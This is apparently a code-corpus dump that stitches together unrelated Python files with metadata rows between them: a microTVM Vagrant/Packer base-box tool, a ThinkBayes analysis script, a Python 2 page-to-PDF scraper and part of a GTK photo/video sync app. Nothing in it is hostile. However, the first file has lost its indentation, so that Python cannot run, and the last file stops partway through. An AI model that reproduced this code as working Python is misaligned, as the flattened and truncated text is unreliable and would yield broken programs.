subprocess.check_call(["VBoxManage", "controlvm", vm_uuid, "usbattach", dev["UUID"]])
return
raise Exception(
f"Device with vid={vid_hex}, pid={pid_hex}, serial={serial!r} not found:\n{usb_devices!r}"
)
def attach_parallels(uuid, vid_hex=None, pid_hex=None, serial=None):
usb_devices = json.loads(
subprocess.check_output(["prlsrvctl", "usb", "list", "-j"], encoding="utf-8")
)
for dev in usb_devices:
_, dev_vid_hex, dev_pid_hex, _, _, dev_serial = dev["System name"].split("|")
dev_vid_hex = dev_vid_hex.lower()
dev_pid_hex = dev_pid_hex.lower()
if (
vid_hex == dev_vid_hex
and pid_hex == dev_pid_hex
and (serial is None or serial == dev_serial)
):
subprocess.check_call(["prlsrvctl", "usb", "set", dev["Name"], uuid])
if "Used-By-Vm-Name" in dev:
subprocess.check_call(
["prlctl", "set", dev["Used-By-Vm-Name"], "--device-disconnect", dev["Name"]]
)
subprocess.check_call(["prlctl", "set", uuid, "--device-connect", dev["Name"]])
return
raise Exception(
f"Device with vid={vid_hex}, pid={pid_hex}, serial={serial!r} not found:\n{usb_devices!r}"
)
def attach_vmware(uuid, vid_hex=None, pid_hex=None, serial=None):
print("NOTE: vmware doesn't seem to support automatic attaching of devices :(")
print("The VMWare VM UUID is {uuid}")
print("Please attach the following usb device using the VMWare GUI:")
if vid_hex is not None:
print(f" - VID: {vid_hex}")
if pid_hex is not None:
print(f" - PID: {pid_hex}")
if serial is not None:
print(f" - Serial: {serial}")
if vid_hex is None and pid_hex is None and serial is None:
print(" - (no specifications given for USB device)")
print()
print("Press [Enter] when the USB device is attached")
input()
ATTACH_USB_DEVICE = {
"parallels": attach_parallels,
"virtualbox": attach_virtualbox,
"vmware_desktop": attach_vmware,
}
def generate_packer_config(platform, file_path, providers):
builders = []
provisioners = []
for provider_name in providers:
builders.append(
{
"name": f"{provider_name}",
"type": "vagrant",
"box_name": f"microtvm-base-{provider_name}",
"output_dir": f"output-packer-{provider_name}",
"communicator": "ssh",
"source_path": "generic/ubuntu1804",
"provider": provider_name,
"template": "Vagrantfile.packer-template",
}
)
repo_root = subprocess.check_output(
["git", "rev-parse", "--show-toplevel"], encoding="utf-8"
).strip()
scripts_to_copy = COMMON_SCRIPTS + EXTRA_SCRIPTS[platform]
for script in scripts_to_copy:
script_path = os.path.join(repo_root, script)
filename = os.path.basename(script_path)
provisioners.append({"type": "file", "source": script_path, "destination": f"~/{filename}"})
provisioners.append(
{
"type": "shell",
"script": "base_box_setup.sh",
}
)
provisioners.append(
{
"type": "shell",
"script": "base_box_provision.sh",
}
)
with open(file_path, "w") as f:
json.dump(
{
"builders": builders,
"provisioners": provisioners,
},
f,
sort_keys=True,
indent=2,
)
def build_command(args):
this_dir = pathlib.Path(THIS_DIR)
base_box_dir = this_dir / args.platform / "base-box"
generate_packer_config(
args.platform,
os.path.join(base_box_dir, PACKER_FILE_NAME),
args.provider or ALL_PROVIDERS,
)
env = copy.copy(os.environ)
packer_args = ["packer", "build", "-force"]
env["PACKER_LOG"] = "1"
env["PACKER_LOG_PATH"] = "packer.log"
if args.debug_packer:
packer_args += ["-debug"]
packer_args += [PACKER_FILE_NAME]
box_package_exists = False
if not args.force:
box_package_dirs = [(base_box_dir / f"output-packer-{p}") for p in args.provider]
for box_package_dir in box_package_dirs:
if box_package_dir.exists():
print(f"A box package {box_package_dir} already exists. Refusing to overwrite it!")
box_package_exists = True
if box_package_exists:
sys.exit("One or more box packages exist (see list above). To rebuild use '--force'")
subprocess.check_call(
packer_args, cwd=os.path.join(THIS_DIR, args.platform, "base-box"), env=env
)
REQUIRED_TEST_CONFIG_KEYS = {
"vid_hex": str,
"pid_hex": str,
}
VM_BOX_RE = re.compile(r'(.*\.vm\.box) = "(.*)"')
# Paths, relative to the platform box directory, which will not be copied to release-test dir.
SKIP_COPY_PATHS = [".vagrant", "base-box"]
def do_build_release_test_vm(
release_test_dir, user_box_dir: pathlib.Path, base_box_dir: pathlib.Path, provider_name
):
if os.path.exists(release_test_dir):
try:
subprocess.check_call(["vagrant", "destroy", "-f"], cwd=release_test_dir)
except subprocess.CalledProcessError:
_LOG.warning("vagrant destroy failed--removing dirtree anyhow", exc_info=True)
shutil.rmtree(release_test_dir)
for dirpath, _, filenames in os.walk(user_box_dir):
rel_path = os.path.relpath(dirpath, user_box_dir)
if any(
rel_path == scp or rel_path.startswith(f"{scp}{os.path.sep}") for scp in SKIP_COPY_PATHS
):
continue
dest_dir = os.path.join(release_test_dir, rel_path)
os.makedirs(dest_dir)
for filename in filenames:
shutil.copy2(os.path.join(dirpath, filename), os.path.join(dest_dir, filename))
release_test_vagrantfile = os.path.join(release_test_dir, "Vagrantfile")
with open(release_test_vagrantfile) as f:
lines = list(f)
found_box_line = False
with open(release_test_vagrantfile, "w") as f:
for line in lines:
# Skip setting version
if "config.vm.box_version" in line:
continue
m = VM_BOX_RE.match(line)
if not m:
f.write(line)
continue
box_package = os.path.join(
base_box_dir, f"output-packer-{provider_name}", "package.box"
)
box_relpath = os.path.relpath(box_package, release_test_dir)
f.write(f'{m.group(1)} = "{box_relpath}"\n')
found_box_line = True
if not found_box_line:
_LOG.error(
"testing provider %s: couldn't find config.box.vm = line in Vagrantfile; unable to test",
provider_name,
)
return False
# Delete the old box registered with Vagrant, which may lead to a falsely-passing release test.
remove_args = ["vagrant", "box", "remove", box_relpath]
return_code = subprocess.call(remove_args, cwd=release_test_dir)
assert return_code in (0, 1), f'{" ".join(remove_args)} returned exit code {return_code}'
subprocess.check_call(["vagrant", "up", f"--provider={provider_name}"], cwd=release_test_dir)
return True
def do_run_release_test(release_test_dir, platform, provider_name, test_config, test_device_serial):
with open(
os.path.join(release_test_dir, ".vagrant", "machines", "default", provider_name, "id")
) as f:
machine_uuid = f.read()
# Check if target is not QEMU
if test_config["vid_hex"] and test_config["pid_hex"]:
ATTACH_USB_DEVICE[provider_name](
machine_uuid,
vid_hex=test_config["vid_hex"],
pid_hex=test_config["pid_hex"],
serial=test_device_serial,
)
tvm_home = os.path.realpath(os.path.join(THIS_DIR, "..", "..", ".."))
def _quote_cmd(cmd):
return " ".join(shlex.quote(a) for a in cmd)
test_cmd = (
_quote_cmd(["cd", tvm_home])
+ " && "
+ _quote_cmd(
[
f"apps/microtvm/reference-vm/{platform}/base-box/base_box_test.sh",
test_config["microtvm_board"],
]
)
)
subprocess.check_call(["vagrant", "ssh", "-c", f"bash -ec '{test_cmd}'"], cwd=release_test_dir)
def test_command(args):
user_box_dir = pathlib.Path(THIS_DIR) / args.platform
base_box_dir = user_box_dir / "base-box"
boards_file = pathlib.Path(THIS_DIR) / ".." / args.platform / "template_project" / "boards.json"
with open(boards_file) as f:
test_config = json.load(f)
# select microTVM test config
microtvm_test_config = test_config[args.microtvm_board]
for key, expected_type in REQUIRED_TEST_CONFIG_KEYS.items():
assert key in microtvm_test_config and isinstance(
microtvm_test_config[key], expected_type
), f"Expected key {key} of type {expected_type} in {boards_file}: {test_config!r}"
microtvm_test_config["vid_hex"] = microtvm_test_config["vid_hex"].lower()
microtvm_test_config["pid_hex"] = microtvm_test_config["pid_hex"].lower()
microtvm_test_config["microtvm_board"] = args.microtvm_board
providers = args.provider
release_test_dir = os.path.join(THIS_DIR, f"release-test-{args.platform}")
if args.skip_build or args.skip_destroy:
assert (
len(providers) == 1
), "--skip-build and/or --skip-destroy was given, but >1 provider specified"
test_failed = False
for provider_name in providers:
try:
if not args.skip_build:
do_build_release_test_vm(
release_test_dir, user_box_dir, base_box_dir, provider_name
)
do_run_release_test(
release_test_dir,
args.platform,
provider_name,
microtvm_test_config,
args.test_device_serial,
)
except subprocess.CalledProcessError:
test_failed = True
sys.exit(
f"\n\nERROR: Provider '{provider_name}' failed the release test. "
"You can re-run it to reproduce the issue without building everything "
"again by passing the --skip-build and specifying only the provider that failed. "
"The VM is still running in case you want to connect it via SSH to "
"investigate further the issue, thus it's necessary to destroy it manually "
"to release the resources back to the host, like a USB device attached to the VM."
)
finally:
            # If we reach this point, do_run_release_test() succeeded, so we can
            # destroy the VM and release its resources back to the host, unless the
            # user asked to keep it (--skip-destroy) or a test failed.
if not (args.skip_destroy or test_failed):
subprocess.check_call(["vagrant", "destroy", "-f"], cwd=release_test_dir)
shutil.rmtree(release_test_dir)
print(f'\n\nThe release tests passed on all specified providers: {", ".join(providers)}.')
def release_command(args):
if args.release_full_name:
vm_name = args.release_full_name
else:
vm_name = f"tlcpack/microtvm-{args.platform}"
if not args.skip_creating_release_version:
subprocess.check_call(
[
"vagrant",
"cloud",
"version",
"create",
vm_name,
args.release_version,
]
)
if not args.release_version:
sys.exit(f"--release-version must be specified")
for provider_name in args.provider:
subprocess.check_call(
[
"vagrant",
"cloud",
"publish",
"-f",
vm_name,
args.release_version,
provider_name,
os.path.join(
THIS_DIR,
args.platform,
"base-box",
f"output-packer-{provider_name}/package.box",
),
]
)
def parse_args():
parser = argparse.ArgumentParser(
description="Automates building, testing, and releasing a base box"
)
subparsers = parser.add_subparsers(help="Action to perform.")
subparsers.required = True
subparsers.dest = "action"
parser.add_argument(
"--provider",
choices=ALL_PROVIDERS,
action="append",
required=True,
help="Name of the provider or providers to act on",
)
# "test" has special options for different platforms, and "build", "release" might
# in the future, so we'll add the platform argument to each one individually.
platform_help_str = "Platform to use (e.g. Arduino, Zephyr)"
# Options for build subcommand
parser_build = subparsers.add_parser("build", help="Build a base box.")
parser_build.set_defaults(func=build_command)
parser_build.add_argument("platform", help=platform_help_str, choices=ALL_PLATFORMS)
parser_build.add_argument(
"--debug-packer",
action="store_true",
help=("Run packer in debug mode, and write log to the base-box directory."),
)
parser_build.add_argument(
"--force",
action="store_true",
help=("Force rebuilding a base box from scratch if one already exists."),
)
# Options for test subcommand
parser_test = subparsers.add_parser("test", help="Test a base box before release.")
parser_test.set_defaults(func=test_command)
parser_test.add_argument(
"--skip-build",
action="store_true",
help=(
"If given, assume a box has already been built in the release-test subdirectory, "
"so use that box to execute the release test script. If the tests fail the VM used "
"for testing will be left running for further investigation and will need to be "
"destroyed manually. If all tests pass on all specified providers no VM is left running, "
"unless --skip-destroy is given too."
),
)
parser_test.add_argument(
"--skip-destroy",
action="store_true",
help=(
"Skip destroying the test VM even if all tests pass. Can only be used if a single "
"provider is specified. Default is to destroy the VM if all tests pass (and always "
"skip destroying it if a test fails)."
),
)
parser_test.add_argument(
"--test-device-serial",
help=(
"If given, attach the test device with this USB serial number. Corresponds to the "
"iSerial field from `lsusb -v` output."
),
)
parser_test_platform_subparsers = parser_test.add_subparsers(help=platform_help_str)
for platform in ALL_PLATFORMS:
platform_specific_parser = parser_test_platform_subparsers.add_parser(platform)
platform_specific_parser.set_defaults(platform=platform)
platform_specific_parser.add_argument(
"--microtvm-board",
choices=ALL_MICROTVM_BOARDS[platform],
required=True,
help="MicroTVM board used for testing.",
)
# Options for release subcommand
parser_release = subparsers.add_parser("release", help="Release base box to cloud.")
parser_release.set_defaults(func=release_command)
parser_release.add_argument("platform", help=platform_help_str, choices=ALL_PLATFORMS)
parser_release.add_argument(
"--release-version",
required=True,
help="Version to release, in the form 'x.y.z'. Must be specified with release.",
)
parser_release.add_argument(
"--skip-creating-release-version",
action="store_true",
help="Skip creating the version and just upload for this provider.",
)
parser_release.add_argument(
"--release-full-name",
required=False,
type=str,
default=None,
help=(
"If set, it will use this as the full release name and version for the box. "
"If this set, it will ignore `--release-version`."
),
)
args = parser.parse_args()
return args
def main():
args = parse_args()
if os.path.sep in args.platform or not os.path.isdir(os.path.join(THIS_DIR, args.platform)):
sys.exit(f"<platform> must be a sub-direcotry of {THIS_DIR}; got {args.platform}")
args.func(args)
if __name__ == "__main__":
main()
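# Illustrative invocations, derived from the argument parser above (provider and
# board names are examples only):
#   ./base-box-tool.py --provider virtualbox build zephyr
#   ./base-box-tool.py --provider virtualbox test zephyr --microtvm-board <board>
#   ./base-box-tool.py --provider virtualbox release zephyr --release-version 1.0.0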
| 34.092879 | 102 | 0.614284 |
4a1b5b17cf79629fd6bc929d42ec86f413ea0b87
| 1,364 |
py
|
Python
|
scripts/effect.py
|
jkurdys/ThinkBayes2
|
1ebab8c10f2fec5db420f8032b23ea3c7d0f1346
|
[
"MIT"
] | 1,337 |
2015-01-06T06:23:55.000Z
|
2022-03-31T21:06:21.000Z
|
scripts/effect.py
|
jkurdys/ThinkBayes2
|
1ebab8c10f2fec5db420f8032b23ea3c7d0f1346
|
[
"MIT"
] | 43 |
2015-04-23T13:14:15.000Z
|
2022-01-04T12:55:59.000Z
|
scripts/effect.py
|
jkurdys/ThinkBayes2
|
1ebab8c10f2fec5db420f8032b23ea3c7d0f1346
|
[
"MIT"
] | 1,497 |
2015-01-13T22:05:32.000Z
|
2022-03-30T09:19:53.000Z
|
"""This file contains code used in "Think Bayes",
by Allen B. Downey, available from greenteapress.com
Copyright 2014 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
from __future__ import print_function, division
from variability import *
import thinkplot
import thinkbayes2
def RunEstimate(update_func, num_points=31, median_flag=False):
"""Runs the whole analysis.
update_func: which of the update functions to use
num_points: number of points in the Suite (in each dimension)
"""
d = ReadHeights(nrows=None)
labels = {1:'male', 2:'female'}
suites = {}
for key, xs in d.items():
label = labels[key]
print(label, len(xs))
Summarize(xs)
xs = thinkbayes2.Jitter(xs, 1.3)
mus, sigmas = FindPriorRanges(xs, num_points, median_flag=median_flag)
suite = Height(mus, sigmas, label)
suites[label] = suite
update_func(suite, xs)
print('MAP', suite.MaximumLikelihood())
# joint distributions of mu and sigma for men and women
suite1 = suites['male']
suite2 = suites['female']
# TODO: compute and plot the distribution of d
def main():
random.seed(17)
func = UpdateSuite5
median_flag = (func == UpdateSuite5)
RunEstimate(func, median_flag=median_flag)
if __name__ == '__main__':
main()
| 23.517241 | 78 | 0.667889 |
4a1b5b4c1c6f066f8916601bd8856b1004dea80b
| 1,575 |
py
|
Python
|
learning/dl-www-to-pdf.py
|
trib0r3/scripts
|
d584acd42ed616ac8aa79137de409b8cc0e81046
|
[
"BSD-2-Clause"
] | null | null | null |
learning/dl-www-to-pdf.py
|
trib0r3/scripts
|
d584acd42ed616ac8aa79137de409b8cc0e81046
|
[
"BSD-2-Clause"
] | null | null | null |
learning/dl-www-to-pdf.py
|
trib0r3/scripts
|
d584acd42ed616ac8aa79137de409b8cc0e81046
|
[
"BSD-2-Clause"
] | null | null | null |
#
# Download WWW pages & convert it into PDF pages
#
# File required: 'style.css' (or delete it from code)
# Files are saved under path <DirectoryName>/interesting-article
# (for url: http://somewebsite.com/somecategory/some/interesting-article)
#
__author__ = "sheadovas"
import pdfkit
import requests
from bs4 import BeautifulSoup
def get_post_html(url):
page = requests.get(url)
    if page.status_code != 200:
print "Error, cannot open: '{}'".format(url)
return
soup = BeautifulSoup(page.content, 'html.parser')
body = soup.find_all('main', id='main', class_='site-main')[0]
return body
def parse_to_pdf(content, dstfile):
TEMPLATE = u"""
<html>
<head>
<meta name="pdfkit-page-size" content="Legal"/>
<meta name="pdfkit-orientation" content="Landscape"/>
<meta charset="UTF-8">
</head>
<body>
{}
</body>
</html>"""
html = TEMPLATE.format(content)
try:
pdfkit.from_string(html, dstfile, css='./style.css')
except Exception as e:
print "!!! Error, Ignore: {}".format(e.strerror)
urls = [
# TODO enter urls HERE, example:
["DirectoryName","http://somewebsite.com/interesting-artice"]
]
i = 1
for pair in urls:
print "==> [{}/{}]".format(i, len(urls))
i += 1
category, url = pair
print "==> {} : {}".format(category, url)
body = get_post_html(url)
title = url.split('/')
filename = "{}/{}.pdf".format(category, title[len(title)-2])
parse_to_pdf(body, filename)
| 24.230769 | 73 | 0.606984 |
4a1b5b589d5f099cb09948efe25545e543719923
| 61,571 |
py
|
Python
|
photosync.py
|
luizoscar/photosync
|
cfdc577d203df71d709182bf375b294f53b6c866
|
[
"Apache-2.0"
] | null | null | null |
photosync.py
|
luizoscar/photosync
|
cfdc577d203df71d709182bf375b294f53b6c866
|
[
"Apache-2.0"
] | null | null | null |
photosync.py
|
luizoscar/photosync
|
cfdc577d203df71d709182bf375b294f53b6c866
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import gi
import sys
import re
import os
import datetime
import time
import getopt
import logging
import math
import shutil
import subprocess
from lxml import etree as ET
from glob import glob
from threading import Thread
from distutils import spawn
from __builtin__ import str
gi.require_version('Gtk', '3.0')
gi.require_version('Gdk', '3.0')
from gi.repository import Gdk, Gtk, GObject, GLib
class VideoEncodeProgressDialog(Gtk.Dialog):
"""
    Dialog used to display the progress of video conversion
"""
total = 0
completed_size = 0
must_stop = False
failed = False
def __init__(self, parent, arquivos, destino):
Gtk.Dialog.__init__(self, "Compactando vídeos ", parent, 0,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL))
self.set_size_request(250, 150)
self.set_border_width(10)
self.lista_arquivos = arquivos
self.dir_destino = destino
# Container principal
grid = Gtk.Grid()
grid.set_column_homogeneous(True)
grid.set_row_homogeneous(True)
grid.set_column_spacing(4)
grid.set_row_spacing(6)
for arquivo in self.lista_arquivos:
self.total = self.total + os.stat(arquivo).st_size
# Label com o título da atividade
grid.attach(Gtk.Label(label="Efetuando a re-codificação de " + str(len(arquivos)) +
" arquivos (" + to_human_size(self.total) + ")", halign=Gtk.Align.START), 0, 0, 6, 1)
# Progresso total
self.progress_bar_total = Gtk.ProgressBar(show_text=True)
grid.attach(self.progress_bar_total, 0, 1, 6, 1)
# Titulo de info do progresso global
self.label_progress_total = Gtk.Label(halign=Gtk.Align.START)
grid.attach(self.label_progress_total, 0, 2, 6, 1)
# Progresso da conversão do arquivo
self.progressbar_atual = Gtk.ProgressBar(show_text=True)
grid.attach(self.progressbar_atual, 0, 3, 6, 1)
# Titulo do arquivo
self.label_atual = Gtk.Label(halign=Gtk.Align.START)
grid.attach(self.label_atual, 0, 4, 6, 1)
self.get_content_area().pack_start(grid, True, True, 0)
self.show_all()
# Inicia a threa de conversão de vídeos
thread = Thread(target=self.processa_videos)
thread.daemon = True
thread.start()
def update_progess(self, titulo_barra_total, progresso_total, titulo_label_total, titulo_label_atual):
"""
Atualiza os contadores do arquivo atual e progresso total
"""
self.progress_bar_total.set_text(titulo_barra_total)
self.progress_bar_total.set_fraction(progresso_total) # O processo deve ser entre 0.0 e 1.0
self.label_progress_total.set_text(titulo_label_total)
self.label_atual.set_text(titulo_label_atual)
return False
def update_progess_arquivo(self, progresso_conversao):
"""
Atualiza o progress bar da conversão do arquivo
"""
self.progressbar_atual.set_fraction(progresso_conversao) # O processo deve ser entre 0.0 e 1.0
return False
def processa_videos(self):
"""
Efetua a conversão dos videos
"""
DURATION = "Duration:"
FRAME = "frame="
TIME = "time="
# Recupera o codec e o path do ffmpeg
codec_idx = get_app_settings("codec_video")
codec_idx = codec_idx if codec_idx is not None else "0"
codec_info = get_codec_info(CODECS_VIDEO[int(codec_idx)])
for arquivo in self.lista_arquivos:
try:
if not os.path.isfile(arquivo):
debug("Ignorando aquivo inexistente: " + arquivo)
self.failed = True
continue
self.completed_size = self.completed_size + os.stat(arquivo).st_size
novo_arquivo = self.dir_destino + os.sep + get_destino_arquivo(arquivo)
arquivo_copia = self.dir_destino + os.sep + os.path.basename(arquivo)
# Monta os parâmetros para a criação do novo video, de acordo com o codec escolhido
args = [get_caminho_ffmpeg(), "-hide_banner", "-i", arquivo_copia]
args.extend(codec_info["params"])
novo_arquivo = novo_arquivo[:novo_arquivo.rindex('.')] + codec_info["sufixo"]
args.append(novo_arquivo)
# Estatísticas da conversão total
titulo_barra_total = "[" + to_human_size(self.completed_size) + "/" + to_human_size(self.total) + "]"
titulo_label_total = "Original: " + os.path.basename(arquivo) + " (" + to_human_size(os.stat(arquivo).st_size) + ")"
if os.path.isfile(novo_arquivo):
titulo_label_atual = "Compactado: " + os.path.basename(novo_arquivo)
else:
titulo_label_atual = "Compactado: <Falha ao ler os dados do arquivo>"
progresso_total = self.completed_size / self.total # Percentual do progresso
# Atualiza as estatíticas do total e o nome do arquivo de destino
GLib.idle_add(self.update_progess, titulo_barra_total, progresso_total, titulo_label_total, titulo_label_atual)
# Cria o diretório, se não existir
directory = os.path.dirname(novo_arquivo)
if not os.path.exists(directory):
debug("Criando o diretório " + directory)
os.makedirs(directory)
# Verifica se o vídeo de destino existe
if os.path.isfile(novo_arquivo):
debug("Removendo arquivo de destino existente: " + novo_arquivo)
os.remove(novo_arquivo)
max_secs = 0
cur_secs = 0
# Checa se o usuário interrrompeu a conversão
if self.must_stop:
return None
# Efetua a conversão do arquivo de video
debug("Executando aplicação: " + str(args))
global g_processo_ffmpeg
g_processo_ffmpeg = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1, universal_newlines=True)
# Inicia o processo e itera entre as linhas recebidas no stdout
for line in iter(g_processo_ffmpeg.stdout.readline, ''):
if DURATION in line:
# Essa linha contém o tamanho total do vídeo
try:
tmp = line[line.find(DURATION):]
tmp = tmp[tmp.find(" ") + 1:]
tmp = tmp[0: tmp.find(".")]
x = time.strptime(tmp, '%H:%M:%S')
max_secs = datetime.timedelta(hours=x.tm_hour, minutes=x.tm_min, seconds=x.tm_sec).total_seconds()
except ValueError:
debug("Falha ao converter o horário: " + tmp)
elif line.startswith(FRAME) and TIME in line:
try:
# Captura o tempo da conversão (timestamp)
tmp = line[line.find(TIME):]
tmp = tmp[tmp.find("=") + 1: tmp.find(".")]
x = time.strptime(tmp, '%H:%M:%S')
cur_secs = datetime.timedelta(hours=x.tm_hour, minutes=x.tm_min, seconds=x.tm_sec).total_seconds()
except ValueError:
debug("Falha ao converter o horário: " + tmp)
# Atualiza o progresso da conversão do arquivo de destino
if cur_secs > 0 and max_secs > 0:
GLib.idle_add(self.update_progess_arquivo, cur_secs / max_secs)
# Finaliza o processo do ffmpeg
g_processo_ffmpeg.stdout.close()
g_processo_ffmpeg.wait()
if os.path.isfile(arquivo):
debug("Vídeo original: " + arquivo + " (" + to_human_size(os.stat(arquivo).st_size) + ")")
if os.path.isfile(novo_arquivo):
debug("Vídeo convertido: " + novo_arquivo + " (" + to_human_size(os.stat(novo_arquivo).st_size) + ")")
# Remove a cópia do video original
if 'True' == get_app_settings("remover_video_apos_conversao"):
video_original = os.path.dirname(novo_arquivo) + os.sep + os.path.basename(arquivo)
if os.path.isfile(video_original):
debug("Removendo a cópia do video original: " + video_original)
os.remove(video_original)
except Exception as e:
debug("Falha ao converter o arquivo de vídeo " + arquivo + " : ", str(e))
self.failed = True
self.close()
class FileCopyProgressDialog(Gtk.Dialog):
"""
    Dialog used to display the progress of file copying
"""
must_stop = False
failed = False
total = 0
completed_size = 0
def __init__(self, parent, arquivos, destino):
Gtk.Dialog.__init__(self, "Copiando arquivos ", parent, 0,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL))
self.set_size_request(250, 150)
self.set_border_width(10)
self.lista_arquivos = arquivos
self.dir_destino = destino
# Container principal
grid = Gtk.Grid()
grid.set_column_homogeneous(True)
grid.set_row_homogeneous(True)
grid.set_column_spacing(4)
grid.set_row_spacing(6)
for arquivo in self.lista_arquivos:
self.total = self.total + os.stat(arquivo).st_size
# Label com o título da atividade
grid.attach(Gtk.Label(label="Efetuando a cópia de " + str(len(arquivos)) +
" arquivos (" + to_human_size(self.total) + ")", halign=Gtk.Align.START), 0, 0, 6, 1)
# Barra de progresso global
self.progress_bar = Gtk.ProgressBar(show_text=True)
grid.attach(self.progress_bar, 0, 1, 6, 1)
# Label do progresso do arquivo
self.label_progress = Gtk.Label(halign=Gtk.Align.START)
grid.attach(self.label_progress, 0, 2, 6, 1)
self.get_content_area().pack_start(grid, True, True, 0)
self.show_all()
thread = Thread(target=self.copia_arquivos)
thread.daemon = True
thread.start()
def update_progess(self, titulo_progresso, progresso_copia, titulo_copia):
"""
Atualiza o progress bar da cópia dos arquivos
"""
self.progress_bar.set_fraction(progresso_copia) # O processo deve ser entre 0.0 e 1.0
self.progress_bar.set_text(titulo_progresso)
self.label_progress.set_text(titulo_copia)
return False
def copia_arquivos(self):
"""
Efetua a cópia dos arquivos
"""
total_arquivos = len(self.lista_arquivos)
for i, arquivo in enumerate(self.lista_arquivos):
try:
self.completed_size = self.completed_size + os.stat(arquivo).st_size
titulo_progresso = "[" + to_human_size(self.completed_size) + "/" + to_human_size(self.total) + "]"
progresso_copia = self.completed_size / self.total # Percentual do progresso
titulo_copia = "[" + str(i) + "/" + str(total_arquivos) + "] " + os.path.basename(arquivo) + " (" + to_human_size(os.stat(arquivo).st_size) + ")"
GLib.idle_add(self.update_progess, titulo_progresso, progresso_copia, titulo_copia)
# Verifica se a cópia foi interrompida
if self.must_stop:
return None
# Cria o diretório, se não existir
novo_arquivo = self.dir_destino + os.sep + get_destino_arquivo(arquivo)
dir_novo_arquivo = os.path.dirname(novo_arquivo)
if not os.path.exists(dir_novo_arquivo):
try:
debug("Criando o diretório " + dir_novo_arquivo)
os.makedirs(dir_novo_arquivo)
except Exception as e:
debug("Falha ao criar o diretório de destino [" + dir_novo_arquivo + "]: " + str(e))
continue
# Sempre copia o arquivo
debug("Copiando " + arquivo + " -> " + novo_arquivo)
shutil.copy2(arquivo, novo_arquivo)
# Se selecionado a opção, remover após a cópia
if 'True' == get_app_settings("remover_apos_copia"):
try:
debug("Removendo arquivo de origem " + arquivo)
os.remove(arquivo)
except Exception as e:
debug("Falha ao remover o arquivo de origem após a cópia [" + arquivo + "]: " + str(e))
except Exception as e:
debug("Falha durante a cópia do arquivo [" + arquivo + "]: " + str(e))
continue
self.close()
class InputDialog(Gtk.Dialog):
"""
    Dialog that requests data from the user via a text field or combo box
"""
text_field = None
combo_box = None
def __init__(self, parent, message, default, opcoes):
Gtk.Dialog.__init__(self, "Solicitação de informação do usuário", parent, 0,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,
Gtk.STOCK_OK, Gtk.ResponseType.OK))
self.set_size_request(350, 150)
self.set_border_width(10)
topbox = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=6)
topbox.pack_start(Gtk.Label(label=message, halign=Gtk.Align.START), True, True, 0)
debug("Solicitação de informação ao usuário: " + message)
if opcoes is None:
# Campo de texto
self.text_field = Gtk.Entry()
self.text_field.set_text(default)
topbox.pack_start(self.text_field, True, True, 0)
else:
self.combo_box = Gtk.ComboBoxText()
# Campo de texto
for i, word in enumerate(opcoes.split('|')):
self.combo_box.append_text(word)
if default and unicode(word) == unicode(default):
self.combo_box.set_active(i)
topbox.pack_start(self.combo_box, True, True, 0)
self.get_content_area().pack_start(topbox, False, False, 0)
self.show_all()
def do_valida_campos(self):
if self.text_field is not None and not self.text_field.get_text().strip():
return show_message('Campo obrigatório não informado:', 'É necessário especificar o valor do campo.')
if self.combo_box is not None and not self.combo_box.get_active_text():
return show_message('Campo obrigatório não informado:', 'É necessário selecionar um item.')
return Gtk.ResponseType.OK
def show_and_get_info(self):
while self.run() == Gtk.ResponseType.OK:
if self.do_valida_campos() is not None:
if self.text_field is not None:
resp = self.text_field.get_text().strip()
else:
resp = self.combo_box.get_active_text()
self.destroy()
return resp
self.destroy()
return None
class ConfigDialog(Gtk.Dialog):
"""
    Application configuration dialog
"""
def __init__(self, parent):
Gtk.Dialog.__init__(self, "Configurações da aplicação", parent, 0,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,
Gtk.STOCK_OK, Gtk.ResponseType.OK))
self.set_size_request(400, 300)
self.set_border_width(10)
grid = Gtk.Grid()
grid.set_column_homogeneous(True)
grid.set_row_homogeneous(True)
grid.set_column_spacing(2)
grid.set_row_spacing(2)
grid_check = Gtk.Grid()
# Apenas fotos e videos
self.check_fotos_videos = Gtk.CheckButton("Copiar apenas as fotos e os vídeos")
self.check_fotos_videos.set_active('True' == get_app_settings("apenas_fotos_e_videos"))
grid_check.attach(self.check_fotos_videos, 0, 0, 3, 1)
# Sobrescrever
self.check_sobrescrever = Gtk.CheckButton("Sobrescrever os arquivos de destino")
self.check_sobrescrever.set_active('True' == get_app_settings("sobrescrever_arquivos"))
grid_check.attach(self.check_sobrescrever, 4, 0, 3, 1)
# Remover após copia
self.check_remover_copia = Gtk.CheckButton("Remover os arquivos originais após a cópia")
self.check_remover_copia.set_active('True' == get_app_settings("remover_apos_copia"))
grid_check.attach(self.check_remover_copia, 0, 1, 3, 1)
# Exibir resolução dos arquivos
self.check_exibir_resolucao = Gtk.CheckButton("Exibir a resolução dos arquivos")
self.check_exibir_resolucao.set_active('True' == get_app_settings("exibir_resolucao_arquivos"))
grid_check.attach(self.check_exibir_resolucao, 4, 1, 3, 1)
# Comprimir videos
self.check_recode = Gtk.CheckButton("Re-codificar arquivos de vídeo")
self.check_recode.set_active('True' == get_app_settings("recodificar_videos"))
grid_check.attach(self.check_recode, 0, 2, 3, 1)
# Formato do video
flowbox = Gtk.FlowBox()
flowbox.add(Gtk.Label(label="Formato do vídeo:", halign=Gtk.Align.START))
self.combo_codecs = Gtk.ComboBoxText()
for codec in CODECS_VIDEO:
self.combo_codecs.append_text(codec)
self.combo_codecs.set_active(0)
self.combo_codecs.set_entry_text_column(1)
codec_idx = get_app_settings("codec_video")
if codec_idx is not None:
self.combo_codecs.set_active(int(codec_idx))
flowbox.add(self.combo_codecs)
grid_check.attach(flowbox, 4, 2, 3, 1)
# Remover Videos convertidos
self.check_remover_video = Gtk.CheckButton("Remover a cópia do video original após a conversão")
self.check_remover_video.set_active('True' == get_app_settings("remover_video_apos_conversao"))
grid_check.attach(self.check_remover_video, 0, 3, 3, 1)
grid.attach(grid_check, 0, 0, 6, 3)
# Campo Destino
self.edit_caminho_ffmpeg = Gtk.Entry()
